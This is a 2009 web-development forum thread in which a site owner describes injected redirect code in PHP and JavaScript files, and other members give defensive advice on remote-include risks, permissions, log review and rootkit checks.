dflow Posted October 12, 2009 Share Posted October 12, 2009 i was attacked by a redirect php injection my pc is clean of viruses so i figure that either my hosting server was hacked or that my php was hacked the hack was an injection of some redirect eval(gikljhoihdalnbd) bullshit and an injection into the bottom end of all js files anyone experience this kind hack before? and if so what can i do to prevent it? Quote Link to comment Share on other sites More sharing options...
gizmola Posted October 12, 2009 Share Posted October 12, 2009 I'm not sure what you mean by redirect php injection. I'm also not sure what you mean about your javascript files. Were they physically changed on the server so that they now include the crackers bad jscript? The only way to figure out what happened is to analyze the system and the logs. Is allow_url_fopen = On set in your php.ini? Quote Link to comment Share on other sites More sharing options...
dflow Posted October 14, 2009 Author Share Posted October 14, 2009 I'm not sure what you mean by redirect php injection. I'm also not sure what you mean about your javascript files. Were they physically changed on the server so that they now include the crackers bad jscript? The only way to figure out what happened is to analyze the system and the logs. Is allow_url_fopen = On set in your php.ini? allow_url_fopen = On set in your php.ini? yes it is on i found changes in the php files and the javascripts now include a line from the cracker Quote Link to comment Share on other sites More sharing options...
GKWelding Posted October 14, 2009 Share Posted October 14, 2009 if physical files on your server have been changed then i would say it's more likely the web server has been compromised than code. Quote Link to comment Share on other sites More sharing options...
dflow Posted October 14, 2009 Author Share Posted October 14, 2009 if physical files on your server have been changed then i would say it's more likely the web server has been compromised than code. i thought maybe i had a virus that attacked my ftp client and uploaded it got my password etc but no viruses Quote Link to comment Share on other sites More sharing options...
gizmola Posted October 15, 2009 Share Posted October 15, 2009 I don't agree at all -- simple code could mistakes and permissions issues could explain what happened. This is why looking at your web logs is important. Here's my thoughts -- 1st turn off allow_url_fopen to off for now. What that does is allow you to specify url's in all sorts of places including requires and includes. This is referred to as remote execution. If they can find any script that builds require or includes paths in an insecure way, they can trick your server into reading code from their server. allow_url_fopen will turn this off for now. Secondarily, modify your permissions on the code directories so that they don't allow write for apache. Replace all the original scripts and javascripts and in the meantime start pouring over and grepping your logs looking for weird urls and in particular anything that includes http://notyourserver in url's. Also make sure you look in your tmp directory. Often rootkits will be deposited initally in there. If you believe there's a chance you were rootkitted, you need to find out asap. Since they seemed to want to exploit your site and don't mind you knowing it, this might bode well for you, as usually they rootkit in order to turn your server into an ftp repo, spam relay, or shadow website. They'll often start up connections to an irc server in order to remote control it via an irc channel. If this is a redhat/centos based server, you have the great tool of rpm to help figure this out, since all the package contents have md5 hashes, you can use rpm to look at the basic packages that a rootkit will screw with, that goes after login, ps, sshd, etc. lsof is a great tool, but sometimes that gets rootkitted too. Again, if it's possible for now, disable php uploads until you figure out what has happened. Try and lock down the server as much as possible while you're doing this. Are you running any standard packages (phpBB, wordpress, etc.) on the server, that might be the source of the exploit? More often than not, exploits are the result of script kiddies who are running an exploit against a particular package. It's very important to figure this out, and patch any holes, or you'll get exploited again. Quote Link to comment Share on other sites More sharing options...
Gayner Posted October 15, 2009 Share Posted October 15, 2009 PHP Is Server side how can people hack unless u got admins of ur servers that hate u am i correct broh? Quote Link to comment Share on other sites More sharing options...
gizmola Posted October 15, 2009 Share Posted October 15, 2009 PHP Is Server side how can people hack unless u got admins of ur servers that hate u am i correct broh? No, as I just explained, the most common way people get exploited is via script kiddies who are exploiting a vulnerability in a particular package. When you have custom software, that requires someone to really do a lot of testing on an app where they don't have the source code. They can try some things, but they're just guessing. Compare that with something like phpBB. There's are tens of thousands of sites running phpBB, so if someone finds an exploit in it, and puts it into an exploit script, they can easily use google to identify a long list of potential victims and then let their bot just run through those, letting the exploit kit do the work. There's absolutely no thought put into it, and they don't know you nor do they care who you are. I have a site for example, that is somewhat old and has a contact form. Every single day I get emails from this contact form that have a bunch of links in them. Clearly there is nothing to be gained from someone posting a form with a bunch of links to offshore viagra sites, that will simply be cleaned out by my spam filter. I continue to receive these because it's a Bot doing the sending that is simply looking for forms and attempting to stick in links and post them. A simple captcha easily defeats this, but I've been too lazy to add it to the contact form. With that said, it is in no way personal, that spammers continue to send these emails day in and day out. If they did, they would quickly realize that it is a complete waste of time to post these to a contact form. Quote Link to comment Share on other sites More sharing options...
dflow Posted October 19, 2009 Author Share Posted October 19, 2009 thanks ill go over my logs i updated avast regarding this exploit so at least now i get an alert the site has been stable for a few days so i did something right changed ftp codes after backup turned off allow_url_fopen also changed ftp client Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.